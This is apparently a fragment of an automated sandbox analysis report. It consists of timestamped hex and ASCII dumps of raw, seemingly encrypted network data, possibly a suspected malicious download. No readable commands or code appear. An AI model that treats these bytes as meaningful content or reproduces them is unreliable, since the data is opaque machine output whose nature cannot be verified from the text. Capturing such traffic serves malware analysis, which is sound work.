8d 12 51 4c de 59 c8 44 5f 39 c4 4c 69 1b 3b 23 89 10 7a 65 89 10 dc c6 6f 13 b1 47 1c 79 d2 07 79 79 d2 5a c4 54 28 46 45 11 9d 47 45 e1 16 4d 68 11 3b 61 89 1d
                                                                                                                  Data Ascii: %ET$/m(*EwD/A[Yk8YQImOC\`\l4nY=NqJT/JEo,]5DIH:eCTHYEEMzlU[TOYF$/C\N3LQLYD_9Li;#zeoGyyyZT(FEGEMh;a
                                                                                                                  2023-08-29 17:16:42 UTC1316INData Raw: ad 0e 99 38 ae 40 4e d0 78 45 f1 3f c4 18 f9 cf 13 46 95 f5 44 69 11 e9 38 45 92 a5 55 3f 19 ce ce 04 e1 ba 45 c4 1d 90 72 19 f1 0e 72 4b 9b 90 4a 4d 95 d5 a5 4a 5e eb 38 45 6b 50 a7 b6 6c 28 ad e6 92 92 76 49 5c 24 31 46 e6 a5 ad a1 9d 80 38 8a 18 20 30 43 a2 b1 71 6d f0 07 25 6a f1 94 e5 62 9a b5 05 59 19 53 38 45 19 b0 54 48 1d a6 7f a9 43 5b 38 41 94 cc 05 ce 92 db ad 71 84 52 88 50 39 5b 4e 18 f1 fc f5 49 92 18 29 a1 9b 20 3a 9a 1f 47 f4 1e d9 d2 00 49 09 eb 00 45 6b 18 ae 4a 1a b0 46 49 55 95 49 3f 3a 5b 8b 4c d9 cf ce 69 1d 85 bd c2 4b c0 4d c0 05 c1 f5 49 94 c4 75 09 51 53 84 4d a9 d2 cc 1a 09 da ce 4d 5c dc 65 45 1a 16 ae 43 92 d0 14 59 92 c4 c7 c0 5b dc 45 09 22 91 4d 3b e8 5b 08 1b f1 b2 2e 3c ed 71 2c a1 79 cc ad 4d 29 6d 74 4e 2a 26 7e 97 64
                                                                                                                  Data Ascii: 8@NxE?FDi8EU?ErrKJMJ^8EkPl(vI\$1F8 0Cqm%jbYS8ETHC[8AqRP9[NI) :GIEkJFIUI?:[LiKMIuQSMM\eECY[E"M;[.<q,yM)mtN*&~d
                                                                                                                  2023-08-29 17:16:42 UTC1320INData Raw: 50 99 0b e0 45 39 9c 10 30 43 4e 38 5f 49 e7 2f ba 7a d9 3b 47 c2 1d d6 1a 45 57 53 a9 59 4a 5b 45 14 0d 55 9e 3d 3c 83 ba e9 0c f0 51 79 69 53 d7 45 99 42 1d 40 f1 d4 05 07 59 fa 51 4b 95 39 05 5b 18 d0 45 f1 1a 91 47 40 3a 90 47 89 11 87 ad 77 98 ff bd cc 17 2f c5 60 1c e9 ce 66 1e 5b 02 09 0a 11 65 0a 09 1f 45 89 14 9d 49 c0 19 9d bd c2 54 c0 cc 04 e5 d0 c8 04 e1 81 15 b6 0c b4 45 5c 29 a0 ce 0c e1 59 00 4b e9 d0 17 c0 5c 24 2f 48 94 d0 00 b9 49 5b 03 45 e6 a0 07 4d d8 ed 54 c9 1a d0 05 4a 92 d0 05 4d 2a 2f 12 21 1b d0 45 4d 19 2f 30 bd e6 a5 b5 59 49 38 11 36 5b 94 07 19 f1 d4 40 88 5d f2 73 72 67 dc 31 69 2f 5b 9a 7a e6 d0 70 6a 22 d0 1b 45 6d ca ce 82 f1 ea 67 d8 1b 12 47 c2 e2 d0 46 7e 98 d1 85 43 c1 55 9e 3c f8 55 ba 29 6c d3 ce 37 15 f0 65 e9 1f
                                                                                                                  Data Ascii: PE90CN8_I/z;GEWSYJ[EU=<QyiSEB@YQK9[EG@:Gw/`f[eEITE\)YK\$/HI[EMTJM*/!EM/0YI86[@]srg1i/[zpj"EmgGF~CU<U)l7e
                                                                                                                  2023-08-29 17:16:42 UTC1324INData Raw: 78 51 99 d2 ba 3c 25 b4 ad c8 89 ce c6 6c c8 d0 25 cd d9 5a 23 79 05 f8 c5 4c 54 0c 14 99 19 cc 2f 11 b9 d5 a4 4f 49 d1 57 2f ee d0 00 a3 19 d8 31 43 de d5 2e 88 1b 50 27 49 69 d6 e4 f8 19 10 43 82 16 b0 54 e2 57 f1 32 18 64 5d 3b 1d 92 d0 4a cc d0 59 1b 19 6d d8 4d a1 8c 21 15 17 3e d0 c0 92 5d a4 08 a9 67 38 4c 9f a9 d7 20 49 e1 d0 c6 2c e5 d0 c8 0c f1 28 15 19 b8 f7 15 d9 92 b1 57 b9 18 74 53 32 89 f0 08 41 b9 f0 19 c9 1a d1 37 ce e5 59 03 11 90 9e 19 49 92 c7 46 99 90 86 25 c2 99 97 41 4a d8 59 03 2d bb 57 44 f2 0d e8 16 1f 92 09 ce 3a 5d 94 12 48 9d df c1 78 88 bd 3e 59 49 df c1 61 9b d0 11 46 9d d2 5a c9 19 ba 69 c4 5c 1c 12 69 49 17 00 81 29 20 49 a1 57 c1 35 75 92 93 05 c9 0d 59 00 99 39 e3 85 71 5a b8 95 55 90 95 45 9d 94 95 8d 19 4e b8 70 68 c9
                                                                                                                  Data Ascii: xQ<%l%Z#yLT/OIW/1C.P'IiCTW2d];JYmM!>]g8L I,(WtS2A7YIF%AJY-WD:]Hx>YIaFZi\iI) IW5uY9qZUENph
                                                                                                                  2023-08-29 17:16:42 UTC1328INData Raw: ad a1 89 c1 4b 43 85 20 40 ec 98 d3 00 fd f0 5a 80 39 19 ba 55 49 e6 c5 41 39 2c a0 69 5b 81 b0 45 a0 9e 01 44 87 f1 57 c4 f9 6b 53 23 39 19 39 11 b9 19 b8 c6 37 51 a0 46 03 89 d0 64 6c 9d aa 04 6f 18 e7 04 45 48 f2 a4 e6 19 f3 33 59 51 5b 70 c1 b9 4b ce 91 4a 70 ba 9f 92 ed c1 18 85 59 65 50 5b 07 d5 c8 6c c4 cc 0c e9 ee 93 4e c9 11 16 76 f8 61 c6 34 09 d0 31 8f 14 1a 63 b9 6c 39 aa b2 30 50 c5 44 da 40 28 a9 6f f8 13 a1 cf 90 3e 8b 75 be 5e 86 75 42 24 69 28 90 94 25 df 07 2f d9 11 68 f5 1d 79 82 40 d7 f9 ec 65 04 f5 53 20 b9 99 a3 4d ca 11 b5 b9 49 99 0d 4f f7 4e d0 55 4e 99 39 68 d8 36 ad 49 49 9d a4 b5 c8 13 dc ad 53 78 e0 0b 18 e9 9e ad d0 9e 61 57 b9 59 a8 4f c9 a7 d5 05 49 99 39 46 d9 1b 50 23 ca 61 d4 40 3c f6 20 eb 4b 9c d0 f7 41 6d 35 c8 19 1b
                                                                                                                  Data Ascii: KC @Z9UIA9,i[EDWkS#997QFdloEH3YQ[pKJpYeP[lNva41cl90PD@(o>u^uB$i(%/hy@eS MIONUN9h6IISxaWYOI9FP#a@< KAm5
                                                                                                                  2023-08-29 17:16:42 UTC1332INData Raw: 4c c9 a8 1c 47 68 19 ce b5 1f f1 aa f8 4b 13 00 c5 81 1b da 45 44 19 da ed 56 19 da 45 52 99 f4 45 40 19 dc b1 1f f1 6e d0 4a 10 d0 43 49 39 d0 58 49 10 52 45 40 1d e3 b3 48 bf a5 6f 70 6c 0c c9 3d 10 50 77 ca c0 e9 30 b9 58 d3 47 b9 5c d3 b1 46 9d 53 45 49 9b d0 05 44 f2 f4 7c 3c e1 11 43 df e1 15 43 84 14 8d 83 44 f2 82 44 c5 5d a5 8d 09 3c 5b 38 41 1b f9 a5 39 4f 87 ad 42 5c fc c6 72 98 d4 bd 97 ef 94 73 c9 1d 51 77 c9 1d 35 c7 4d 1a 95 4e c8 8c 50 41 9b 99 d4 c6 34 d1 d0 05 3d 16 50 38 56 19 51 58 81 18 d3 5f c4 6c 1c c8 34 f9 3b 55 59 94 95 c5 09 90 30 15 a1 0f 9f 05 43 99 5f e0 49 19 53 20 81 19 d0 c6 2c d9 d0 83 0c 06 d4 44 8f d9 b2 cc 14 c1 39 4c 48 99 73 4a f6 5a d4 0d 46 9d d0 a7 48 19 d0 c6 a1 11 df 45 cd 84 d5 45 49 51 98 31 c9 4a 53 ad 4c 16
                                                                                                                  Data Ascii: LGhKEDVERE@nJCI9XIRE@Hopl=Pw0XG\FSEID|<CCDD]<[8A9OB\rsQw5MNPA4=P8VQX_l4;UY0C_IS ,D9LHsJZFHEEIQ1JSL
                                                                                                                  2023-08-29 17:16:42 UTC1336INData Raw: c6 4c 18 b7 45 48 19 5d 07 76 18 d9 38 5d 92 d7 c5 c3 09 90 c0 89 6c c3 ba 3f 3b c7 c1 6b fe f1 52 46 9c f9 a4 4a 6f c8 51 a0 0e 31 45 0f 58 d3 c6 2c e9 d1 65 17 e1 38 80 d0 e6 2f 4a 49 ae 28 ce 0c e1 55 85 8e 89 95 4d 49 11 b0 4b cd e9 b1 1d 69 9c 2f 4a cd 93 70 07 c4 49 d0 47 2f 92 d8 05 09 7f 55 4d 80 6c 26 64 e9 92 20 ad 3a 18 10 0c ca 7c d8 45 4a df 5d 45 3d 19 d2 13 a1 4b 33 bb 48 f9 dc cc 0c e9 a4 1e c4 54 90 4d 18 4e 01 ab 1f 78 e2 ad 4b f6 11 0b 0c 11 11 ad 42 ee f0 95 e1 18 a4 7d 28 0b f1 7d 48 7a cc 31 63 92 d6 ce 87 e6 90 15 21 e6 e5 15 54 f9 f8 55 69 92 18 ba 1b 05 50 13 5b 93 f0 03 05 c9 38 b3 49 1f a5 42 c8 58 c2 45 59 19 5b 00 b9 99 c5 dd c2 6c c4 07 4f 39 cc 4a cc f9 4b 44 09 00 d4 76 bf 90 95 b1 c0 79 a5 a9 a1 3b 32 85 43 f8 74 ad 09 f1
                                                                                                                  Data Ascii: LEH]v8]l?;kRFJoQ1EX,e8/JI(UMIKi/JpIG/UMl&d :|EJ]E=K3HTMNxKB}(}Hz1c!TUiP[8IBXEY[lO9JKDvy;2Ct
                                                                                                                  2023-08-29 17:16:42 UTC1340INData Raw: ad d5 5b 03 05 67 6f dc ad 32 a8 d7 0b 41 11 38 c9 b9 19 86 ad b6 87 dc b9 b6 09 f5 cd 4e f1 ae 89 b7 0e a0 d0 f0 39 b3 06 ac 79 9e 18 a0 d7 13 45 4a 6a f8 55 a1 9b 1e 40 ef 98 f0 a6 4c 1a 20 28 70 2c b4 f5 5b b9 d9 a4 43 09 8e 86 ca 24 31 45 48 6f d8 41 b6 14 51 45 a2 7b 2f 70 29 10 a0 45 a1 86 21 06 44 2d cc 79 c9 69 b8 cd d1 2d a0 cc 1a 18 da 6c d8 82 e5 14 48 f1 1f f0 4a 5c 64 4c c0 1b d1 ba 5c ad c0 4f b6 3d e5 65 f9 19 53 48 7b 12 2f 50 51 8d c1 75 a9 18 f1 44 a1 ec 1b 7d b7 e6 59 f7 4e 12 dc 54 cf 9a f6 5d 49 f1 98 57 20 fc be 57 c3 54 d4 4d ca 49 f9 c6 29 11 d0 cd 39 51 dc cc 4f e2 65 04 33 9b db 33 41 13 2f 40 7a 1c 8f 86 1a 4f c0 ad e0 d3 2e f5 48 ef b8 45 68 59 73 03 1e 90 ed 24 68 90 e5 c5 21 53 eb 35 8e 1c bc 15 49 97 92 b5 68 79 c7 15 40 22
                                                                                                                  Data Ascii: [go2A8N9yEJjU@L (p,[C$1EHoAQE{/p)E!D-yi-lHJ\dL\O=eSH{/PQuD}YNT]IW WTMI)9QOe33A/@zO.HEhYs$h!S5Ihy@"
                                                                                                                  2023-08-29 17:16:42 UTC1344INData Raw: 7c 7c f1 e8 7e 39 16 55 83 8a 98 ed 83 5b 16 55 f6 09 1b 51 77 d1 16 54 3e 49 68 90 49 29 75 d1 d8 89 90 95 b1 46 9d 51 84 43 db e2 45 ca 7c d8 45 ca 62 d8 45 69 6f a1 ce 0a 09 10 29 c2 25 d0 cd c2 d6 59 38 b1 f1 e2 44 0b 12 a5 0a c2 d6 38 09 48 3c 12 0a 0d 58 59 fd 77 59 59 8a a1 1d 5c 4e c9 0d 28 c0 b6 6d ff 4d 2f 9a af 45 00 38 5b 02 45 98 90 86 53 73 f6 15 b6 0c 91 03 4c 58 ef 31 49 f2 24 ce 04 e1 38 c1 ce f7 90 4e 86 f1 23 c3 89 b6 d0 00 41 92 95 4d 72 5a d8 61 3b 96 51 b4 9d 2a d2 2c 19 f1 b2 ea 09 41 39 8a b7 19 40 c6 51 0c d9 44 f1 6c dc 42 53 6d fc 7c 7c 1f f0 44 6f 70 d2 5d 72 cf df c0 43 ab dc 5a eb 39 d1 7e 9f 6c de 40 49 33 da 24 66 d2 38 56 b3 e6 ca ba 0a 38 a0 65 45 3c eb 4a cc 7b f1 e4 48 d2 38 02 22 58 cd 4a cc 43 83 86 48 7a 70 50 68 29
                                                                                                                  Data Ascii: ||~9U[UQwT>IhI)uFQCE|EbEio)%Y8D8H<XYwYY\N(mM/E8[ESsLX1I$8N#AMrZa;Q*,A9@QDlBSm||Dop]rCZ9~l@I3$f8V8eE<J{H8"XJCHzpPh)
                                                                                                                  2023-08-29 17:16:42 UTC1348INData Raw: 71 2b 04 d8 15 2c de 58 00 b5 19 20 59 a1 fe e2 45 05 99 af 05 7a c2 e8 1b 0d 4b b1 47 7d b9 df c8 0c d5 80 fa 05 1b 97 25 20 4a 58 1b 0d de 95 21 85 29 a1 01 5c 61 20 23 f9 5e fc 66 c9 2d f0 6a 12 73 e0 35 4b 4a 80 45 a1 e4 e4 41 49 9a 14 49 cb 4a a4 47 8e 5c 00 45 09 fc d2 4d 21 19 af 65 7c 90 95 a5 b6 1d c5 75 29 1a 59 00 a1 b8 94 c0 3b 19 04 74 4f de 95 a9 4f 88 97 e5 34 ed 2f 50 7d 79 d1 23 78 52 d2 87 68 02 1e ad 9c f5 2e ba 51 9a 28 44 a8 50 40 4f 08 19 83 63 1a 68 5e 15 49 4a b8 45 4b 5f 83 64 19 34 2c ba 5c 21 80 46 72 da 90 cc 0f 55 df c1 c3 79 d1 13 49 71 98 83 7d 69 80 ad 15 51 22 47 49 19 ca ce 4f 69 ff d5 4f 99 50 44 78 1b 98 31 23 73 2c 40 b9 12 9c 71 4a 49 a4 1f 1f 71 52 f2 b9 1b 2f 33 01 f1 fa 55 4a 0f 68 34 42 59 89 33 a9 3a 33 47 49 11
                                                                                                                  Data Ascii: q+,X YEzKG}% JX!)\a #^f-js5KJEAIIJG\EM!e|u)Y;tOO4/P}y#xRh.Q(DP@Och^IJEK_d4,\!FrUyIq}iQ"GIOiOPDx1#s,@qJIqR/3UJh4BY3:3GI
                                                                                                                  2023-08-29 17:16:42 UTC1352INData Raw: 31 6c e6 2f ad a9 11 d1 45 41 b3 07 bb b6 e6 a5 a9 49 92 1b cc 3c e5 38 72 b3 9b 2f 45 51 e9 5b 8e a1 68 d0 4c 49 9a 9d b9 b6 f1 c2 b5 b7 91 2f ad d4 19 f9 ba 3c 01 d0 7f 49 e6 a5 51 19 e6 a5 49 b6 29 a5 4d a1 56 d0 7d 4f bf 38 99 4a 19 45 43 e0 3d 38 d8 c0 e7 2f 45 7a d0 eb 84 3d 0a 17 45 49 0d cb 75 39 90 98 41 c0 19 98 4d c0 51 dc 23 c0 51 d4 55 8a 1b f5 ce b6 4c 5b a9 49 9a 3c 65 1f 92 21 c6 37 39 d4 45 46 9d 0e 45 84 4a 5b 4d 14 11 87 45 0f 47 d8 ad 76 19 05 bb b6 9a 28 44 3c 05 d0 2f a5 e6 a6 41 b6 0c 9c c4 49 92 dd 45 49 49 d0 15 4d 11 92 15 49 11 5d 00 a9 49 d2 43 ed 18 d0 30 ca 7c 28 45 7a d9 5d c5 34 e5 5b 8e e2 f1 d0 46 56 19 a4 7b c2 1a 5b 8e b6 49 d0 2d b6 2c 80 58 75 69 5b 45 59 92 18 ba 1b 05 54 85 49 6d f6 c8 0c e9 80 ba 3a 89 90 ba 5c a9
                                                                                                                  Data Ascii: 1l/EAI<8r/EQ[hLI/<IQI)MV}O8JEC=8/Ez=EIu9AMQ#QUL[I<e!79EFEJ[MEGv(D</AIEIIMI]IC0|(Ez]4[FV{[I-,Xui[EYTIm:\
                                                                                                                  2023-08-29 17:16:42 UTC1356INData Raw: 47 04 d9 d5 ba 3c e9 2f 12 51 d4 f2 40 45 39 d5 24 5d 5f 84 85 5d f8 53 c9 a1 f3 70 f7 c8 13 38 ed 26 18 7f d7 a1 18 7f 7e 82 19 7f a6 0d 78 97 49 a1 b4 b0 5b 6a 3f 53 84 1d 48 fc ad cb b9 d4 4d 61 48 30 d6 41 4f d0 12 c4 5c 2c 76 b6 49 87 45 c0 64 2c cc 72 f1 52 6d 48 fb ae b2 35 25 5b 08 b5 73 80 40 a1 24 12 a1 48 35 31 44 4b 5d 88 15 49 19 38 a5 b5 9d d2 52 78 99 d2 12 a1 07 70 55 8b 18 d8 ce 79 5c 2c cc 4a 19 d9 05 43 49 38 79 de b7 50 e7 69 28 70 d1 0c 28 dc fd c3 91 91 74 21 79 e4 ce b8 4f 10 75 69 2a 0b ad 90 eb 90 61 34 11 10 64 56 ef 96 05 48 d9 e2 65 55 15 a4 0f 69 04 b0 dc 0a 92 98 4d 49 9a 29 46 3c 13 5b 05 59 19 5b 05 41 90 d7 ae 7f 9a 10 bc 4b 6c fc ce 4f b8 ff 05 8c ad 80 3d eb dd f0 c5 6d 79 f6 3a c8 34 4d a4 48 09 70 74 c8 c1 d0 43 4c a2
                                                                                                                  Data Ascii: G</Q@E9$]_]Sp8&~xI[j?SHMaH0AO\,vIEd,rRmH5%[s@$H51DK]I8RxpUy\,JCI8yPi(p(t!yOui*a4dVHeUiMI)F<[Y[AKlO=my:4MHptCL
                                                                                                                  2023-08-29 17:16:42 UTC1360INData Raw: 69 c5 08 56 6f 25 1a 93 d7 4c 5a fc 5f 0a da 53 6c 58 5a 84 0d 4b 5a 9e 40 0a f1 f9 44 47 5a 86 2f 4b e6 e5 e1 d5 39 eb 35 a1 36 7e 45 6c 69 dc d5 c2 d1 38 84 48 0a 16 1b 4c 60 79 47 58 b9 4d 45 58 15 d6 54 d7 09 c1 17 f9 98 f2 ac e4 1c c1 3e 59 08 40 6f d7 19 c1 83 4f 08 88 55 58 99 4f d0 49 08 73 43 58 2c c0 54 e1 b9 d0 54 e3 99 d6 54 5b 12 c1 16 48 08 48 c4 6b 0b 8d 45 58 93 88 44 58 f6 f8 b9 19 e6 5a 86 12 13 c1 c9 48 08 ea 10 4f 08 1c 55 58 ad d1 5f 5e 9f d8 ec ec 89 d8 85 c8 11 24 e9 cc 11 56 ce 41 20 98 2d 68 9b 81 2d 08 47 90 2d e5 d1 1d 01 21 5f 10 4a 1e 60 0d c4 98 09 d1 10 7c d9 c0 2d 8c 09 d2 91 59 19 c0 dd b7 0b 2f 45 59 16 7f 05 5a d6 38 ba 09 e4 2f ba 62 df 80 05 4b 4a 8b 45 f1 99 d1 ab 49 1d 42 48 28 90 dd 8d 1c 59 d9 46 cb 14 cc c6 44 ae
                                                                                                                  Data Ascii: iVo%LZ_SlXZKZ@DGZ/K956~Eli8HL`yGXMEXT>Y@oOUXOIsCX,TTT[HHkEXDXZHOUX_^$VA -h-G-!_J`|-Y/EYZ8/bKJEIBH(YFD
                                                                                                                  2023-08-29 17:16:42 UTC1364INData Raw: ce 48 4e 5d 10 bd 4b 90 2f 42 4e 2f 15 71 c9 d1 42 49 92 c0 ce 81 e6 82 05 c0 19 ae 05 c2 5f 98 7e 8e 6f 7a 4e 09 19 59 55 01 1a c2 44 0d 09 d1 45 4d 51 59 03 0d 46 e3 85 4d 47 19 bd 7c 73 9c ad 14 58 33 96 38 29 d4 8b a1 8f 21 78 6f 0e 35 49 45 92 96 d0 1a 09 dd 4b ca 67 dc 47 4b 29 d1 42 1f e6 80 3d a2 89 c4 7e 4c 79 70 4b 3c 15 80 44 09 19 a5 43 1f f1 eb 05 54 4f c9 35 3c 76 00 36 44 b2 c1 b4 b6 5f 82 0d f9 2a 39 05 79 1e dd c4 4a 90 b0 0d 4d 92 9d 4d c9 04 11 24 34 77 14 37 2c 86 97 d5 0e 56 d2 77 d6 5e ed 7e 58 12 4b 02 32 f8 c9 da 0e 4f ee 21 1b 00 83 7b c3 c9 7f 65 32 80 d8 fd f9 19 84 7c 39 f1 6c 94 4a 19 d0 cc 04 f5 e3 9e 7a ef 59 45 14 e9 5d 08 b9 90 8d b9 41 f1 18 fe 19 1f 9d 49 19 f1 d4 87 d0 c8 87 7e b2 6d 96 7c 69 6e d8 33 08 92 90 12 7d 81
                                                                                                                  Data Ascii: HN]K/BN/qBI_~ozNYUDEMQYFMG|sX38)!xo5IEKgGK)B=~LypK<DCTO5<v6D_*9yJMM$4w7,Vw^~XK2O!{e2|9lJzYE]AI~m|in3}
                                                                                                                  2023-08-29 17:16:42 UTC1368INData Raw: ce 04 cd fb 08 48 19 78 c8 0c ed 80 ce 82 f1 d0 af b5 e6 2f ba 3a 5d 5b 45 71 92 a0 41 b6 0c 94 53 09 29 a0 c0 89 6c f8 45 0d 94 90 00 95 49 2f 50 09 19 f0 4a c9 af 93 0d 19 e6 a3 05 49 3b d0 2f 49 49 86 12 c4 5c 3c 45 19 f1 a6 b8 b6 e6 3b 5f 49 16 66 0e 01 92 93 71 18 08 d0 7f b6 6a ec 40 7f 09 2e ba 49 e6 5b b5 c2 1a 5d 38 95 19 75 e0 ec 92 1b e0 b6 49 d0 71 19 92 d3 2f 49 92 1b 15 b6 49 e0 15 4a 40 7c 47 d8 f1 c0 6e 0c f9 ba 45 55 5c 34 6e 68 18 c5 30 a9 e6 a5 45 2d e6 a3 44 49 92 98 50 79 69 38 1c 3e 1d 2e ba 4a 05 5b 0e 6d 49 38 59 ad 80 d0 1c 4b 2d d2 4b 50 83 2f 45 b6 f1 6e ca b7 e6 8e ce c9 5c 2c 1a 12 d0 13 89 48 19 d0 2f 4d a1 e0 10 70 69 38 45 a0 a3 d3 45 c2 e8 e3 ba 49 20 ae 61 3c 13 6b 40 09 19 d0 c5 a0 ca d0 45 49 e6 d0 30 45 94 9e 75 a1 66
                                                                                                                  Data Ascii: Hx/:][EqAS)lEI/PJI;/II\<E;_Ifqj@.I[]8uIq/IIJ@|GnEU\4nh0E-DIPyi8>.J[mI8YK-KP/En\,H/Mpi8EEI a<k@EI0Euf
                                                                                                                  2023-08-29 17:16:42 UTC1372INData Raw: 76 89 90 8d 89 c4 0d ad 95 cb 30 1c 05 6a c5 2f 50 48 58 7a ce 0c cd fb 00 85 94 d0 10 a9 90 95 a5 c2 5c 08 f5 62 5c 00 17 ca 38 94 b7 0d 9b d2 55 c4 4c 1c 17 c9 15 83 13 1a 8d ba be c9 1b fc c7 5b 64 f2 26 45 8a 71 51 09 17 ad 56 cb 0e a4 4c ca 09 d0 cc 17 09 59 1b 51 92 9d 44 29 3f 34 1a 17 2a 1d 1e a1 33 46 85 78 d0 fa 0b 18 59 ae 13 7a 1b 26 45 ce 34 f1 30 b5 94 9d 65 b5 48 80 ad 38 f9 9a ce b9 49 55 b3 35 03 32 14 b5 5d 52 14 b1 05 5b b5 e9 18 b3 4e 09 24 d6 4c 6a 53 72 67 c0 4a d8 ac 5a 72 85 41 8c 18 d0 ce 88 2a 19 82 49 f5 85 05 79 69 17 05 4d b5 12 45 41 0b bc 87 49 15 98 85 49 90 98 55 49 91 98 51 c1 51 c5 cc 01 79 c8 82 09 05 d1 25 67 bc 45 13 09 73 f0 ad 2e 0c 2e 07 5a 6d 90 42 c2 d7 38 f4 b6 f9 c4 83 82 b0 49 44 02 09 70 c5 a1 d7 91 46 a9 1d
                                                                                                                  Data Ascii: v0j/PHXz\b\8UL[d&EqQVLYQD)?4*3FxYz&E40eH8IU52]R[N$LjSrgJZrA*IyiMEAIIUIQQy%gEs..ZmB8IDpF
                                                                                                                  2023-08-29 17:16:42 UTC1376INData Raw: 45 3d 55 50 04 41 9c 10 33 41 49 a0 c1 91 5b 1b 45 0c 18 da d5 9d 09 80 94 04 1d 13 ca 95 54 ba 5d a1 91 2f 2b b4 0d 54 34 1b c1 d3 14 e9 1a 40 59 1e 38 70 59 31 11 a6 5e 0b 25 68 cc 3d 5c 2c 07 47 09 80 cf 89 18 82 52 ac 00 b0 57 a1 6f 00 77 78 7b 1e ad a2 05 40 bb f9 81 a7 2e bc 42 50 3b 41 19 d0 12 c2 e0 a5 77 ca 67 c0 49 4b 6c fc c4 0e 1c 18 3c 89 22 a0 30 68 92 de a4 c9 b7 b0 ed 40 e6 e6 25 d6 71 40 0f 1f 69 d0 c9 00 97 b1 40 de 12 c0 fd c9 a8 99 41 02 89 61 0c 7a e6 59 38 a1 71 38 e1 34 e9 fc 2b 99 3a 81 0d 31 59 d8 cc 34 e5 a6 18 2a 12 5b 45 79 4f 16 00 ba 19 38 10 1b 20 71 38 3c 01 50 27 73 6a cc 13 51 f1 c7 db 18 64 30 44 48 6d f6 45 ca 7c 3c 45 c4 54 3c 14 40 49 f8 17 08 b8 d2 cc 0c f1 ac df 69 0b ee 4f c9 5b 00 48 62 91 32 40 7c 9b df e6 39 56
                                                                                                                  Data Ascii: E=UPA3AI[ET]/+T4@Y8pY1^%h=\,GRWowx{@.BP;AwgIKl<"0h@%q@i@AazY8q84+:1Y4*[EyO8 q8<P'sjQd0DHmE|<ET<@IiO[Hb2@|9V
                                                                                                                  2023-08-29 17:16:42 UTC1380INData Raw: 1f 79 69 a4 42 1f 19 38 d6 30 1a d0 1c c2 df d1 57 27 66 dc 45 c2 e8 df c0 49 8f d0 45 49 92 97 4d cc 19 10 31 40 9a 28 47 46 9c f2 c3 c9 1e 38 bb b0 9b b4 10 1a 19 86 ad 1e c5 2e ba 19 90 c0 00 41 e6 c5 43 eb 29 50 3b d9 50 d0 31 69 87 70 ba 3c 99 ca 44 c8 b8 ba 45 c2 d7 16 03 00 19 d0 ad 8b 9e 2e ba 12 92 d0 02 59 51 a4 5f 01 6d dd 4d 01 6c cc c4 c1 ac 2c ba b6 8d 3b 57 c8 1d 4c c5 d3 f2 d8 c4 4d 5f c8 c5 40 98 d3 b1 31 e7 5e d3 14 15 39 82 c9 0a 52 42 23 0d 38 cc c1 f1 2d ba 49 47 d6 82 49 18 aa 47 8a 1e c3 ce 0c 0d 83 76 92 59 59 5d a1 91 a3 bb c9 09 a5 45 43 a1 d5 05 49 99 39 c2 48 d9 e7 7c 54 21 cc 79 39 6d f0 ab 1f f1 6b ba 48 45 eb b6 68 1c 8c 2e c2 5c dc 05 0e 09 59 45 0f 1d 5b 00 41 90 ae 4d 69 90 96 55 a1 3c d0 55 c0 5f d8 49 c2 14 91 48 c2 18
                                                                                                                  Data Ascii: yiB80W'fEIEIM1@(GF8.AC)P;P1ip<DE.YQ_mMl,;WLM_@1^9RB#8-IGIGvYY]ECI9H|T!y9mkHEh.\YE[AMiU<U_IH
                                                                                                                  2023-08-29 17:16:42 UTC1384INData Raw: 36 41 ba 5b 00 5d 19 83 76 92 90 c8 ad d2 4a d2 bb c9 09 a5 4f f1 1c 90 45 41 99 39 c2 c9 31 e9 58 71 05 50 79 39 6d 3e 13 a1 a2 52 1d cd 22 23 c0 11 72 5b 00 45 d9 ed 45 59 90 96 41 c2 5c d8 cc c9 67 d8 cc 0f 09 38 7d 49 09 f0 cc 0f 15 5b 48 08 14 5b 44 49 e6 80 4d 72 e2 59 00 41 1d a6 73 49 12 5d 79 d1 92 d7 0d c0 81 68 05 5c f1 f1 85 40 92 e0 4a c0 98 6c 45 4a 59 df ce 46 39 d3 86 c0 98 10 44 4a 1e 93 05 72 44 c0 cc f9 dd 10 47 3b 5b 1a 45 6f 90 e0 76 89 d9 e1 18 ea dc e1 47 65 f1 22 17 4b 33 d7 47 63 99 3b 00 b6 6c d8 ad 96 99 d4 49 c2 d1 92 65 09 1f e0 2d c1 06 94 79 39 99 b4 ba 3c 15 91 42 5d 98 90 6a cc d9 ac 5e b6 2c 13 40 01 11 38 ea 8a 12 54 2c 88 12 ac 05 4b 2a 10 18 8b 15 54 0f 48 1d b8 c9 49 10 b8 b5 78 29 a0 89 a1 95 d0 4b ca 53 71 d5 49 1c
                                                                                                                  Data Ascii: 6A[]vJOEA91XqPy9m>R"#r[EEYA\g8}I[H[DIMrYAsI]yh\@JlEJYF9DJrDG;[EovGe"K3Gc;lIe-y9<B]j^,@8T,K*THIx)KSqI
                                                                                                                  2023-08-29 17:16:42 UTC1388INData Raw: 05 59 f2 21 c9 de dc 11 c8 0f 48 da 8a a1 3a 50 01 44 0f 48 18 a0 55 85 02 c9 7b 48 eb cc 7b 37 44 44 33 c3 81 01 8e e9 8a 01 88 c1 84 01 f7 6b 14 39 d6 98 8e 01 2d d0 41 8b 51 56 5f b2 d6 98 84 01 04 a0 47 86 51 1f 0d 86 51 13 0d bf f7 e3 57 80 51 0b 65 48 39 c2 54 41 db 98 56 e8 5a 1f 0d b6 2c a3 44 41 f1 7b 4c ba 1b 50 0a 86 51 d0 2f 49 71 fc 61 21 49 96 9c 86 4f 21 c3 69 d7 99 c5 84 0a d2 d5 4a 69 dc 85 4a bc 8a 38 59 2b 16 43 d4 3b d2 11 68 1b 20 0f 48 3c d2 c7 66 1b e5 69 68 1b 1d 60 6f 1b 8f 6c 4b b8 68 6a 06 1f ec 88 88 11 88 e5 77 3c 9f b1 75 86 f8 e7 66 99 53 65 49 9a b0 41 49 ff c2 78 a9 ba 71 d5 83 e7 9e 54 4c 41 d6 c6 a5 19 fc 16 1f 4e 5d 00 9d 49 94 76 92 f9 57 5d c2 e0 a0 3e c0 3d ad b9 4e 0d 58 ea 18 b7 38 52 1c 48 f0 8a c9 6f e1 c5 49 32
                                                                                                                  Data Ascii: Y!H:PDHU{H{7DD3k9-AQV_GQQWQeH9TAVZ,DA{LPQ/Iqa!IO!iJiJ8Y+C;h H<fih`olKhjw<ufSeIAIxqTLAN]IvW]>=NX8RHoI2
